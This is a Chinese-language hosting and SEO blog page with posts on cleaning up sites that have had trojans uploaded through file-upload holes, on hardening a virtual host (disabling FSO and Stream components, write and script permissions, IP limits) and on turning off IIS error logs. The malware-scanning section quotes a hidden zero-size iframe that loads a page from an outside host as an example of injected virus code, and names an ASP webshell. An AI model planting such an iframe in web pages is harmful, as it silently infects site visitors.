搜索引擎优化(SEO)菜鸟版@搜索引擎研究专案

作者:admin 日期:2007-04-20

网站被上传木马(网站被黑)如何处理

作者:admin 日期:2008-11-16

  有时会收到一些客户反映网站被黑，或被上传木马，当用户访问网站时就会下载病毒或者木马，杀毒软件弹出病毒的提示。这种情况是以下2种情况导致的。

      第一种情况：客户网站存在文件上传漏洞。导致黑客可以使用这漏洞，上传黑客文件。然后黑客可以对该用户网站所有文件进行任意修改，这种情况比较普遍。针对这种情况，用户需要找技术人员，检查出网站漏洞并彻底修复，并检查看网站是否还有黑客隐藏的恶意文件。

      原因：很多网站都需要使用到文件上传功能，例如很多网站需要发布产品图片等。

分类:Asp | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 21

主机10重保护

作者:admin 日期:2008-11-15

Stream开关设置
　　ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。

Fso开关设置
　　FSO(FileSystemObject)是微软ASP的一个对文件操作的控件，该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。

Ftp权限设置
　　如果你的网站建好后，今后一段时间都不会再用到ftp上传功能，您可以暂时关闭FTP上传。这有助于提高网站的安全，即使ftp密码泄露，黑客也不能操作你空间内的文件。同时系统支持设置拒绝所有IP，只允许某些IP登录。进一步提高安全性。

脚本权限设置
　　您可以设置您的网站支持哪些网站脚本，如果您的网站只使用了asp，您可以设置为只开放asp权限。这样黑客即使上传了php的木马到您的空间也不能运行！最少的权限＝最大的安全！

写入权限设置
　　本系统支持全国领先的目录权限设置，允许关闭网站的写入权限，锁定虚拟主机。对安全有重要意义，例如可以将access数据库放在databases目录，而将wwwroot目录的写入权限关闭，令asp木马根本无法上传，这样比关闭FSO更安全。

IP 限制
　　您可以明确拒绝或授权某些IP地址对您网站的访问。对某些重要的子目录，如论坛的后台管理目录/admin/您可以设置为所有人拒绝访问，只允许您自己的ip访问.这样即使黑客知道了你论坛的超级管理密码，也无法对你的论坛进行管理和破坏！

文件保护
　　您可以设置您要保护的文件，当文件被保护之后，该文件将无法从web访问。您可以使用该功能来保护您的重要文件的安全性，比如ACCESS数据库等。

目录保护
　　通常用户网站被黑（如网页被篡改,文件被盗，被删等）都是因为黑客通过网站的文件上传功能将asp/php木马上传到空间并运行造成的。　　所以在无法确认系统是否存在上传漏洞的情况下，只要保证文件上传目录没有脚本运行权限，那么即便黑客将木马上传到您的空间他也无法运行,这样就无法危及您的网站，使您网站更安全。

自动查杀病毒木马
　　功能介绍：如果您的网站存在上传漏洞或注入漏洞，很容易被黑客上传木马，添加病毒代码。查看您的网页源代码，会发现病毒代码一般是：　
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等，而黑客通常会在您的网站里面留下后门程序，如海洋顶端asp木马，以便日后再次侵入您的网站。使用该功能，可以轻松将这些病毒木马一网打尽！

服务器C盘空间不足？无故死机?关闭服务器HTTPERR日志，降低CPU占用！

默认情况下，2003服务器会把所有IIS访问错误的记录写入 C:\WINDOWS\system32\LogFiles\HTTPERR 下的 log 文件中，如果访问量比较大，可能一段时间后日志文件可能会占满C盘空间，导致服务器死机。同时因为要写入所有的IIS访问记录，如果访问量较大会大大增加服务器CPU占用率

关闭HTTPERR的方法

分类:Asp | 固定链接 | 禁止评论 | 引用: 9118 | 查看次数: 2273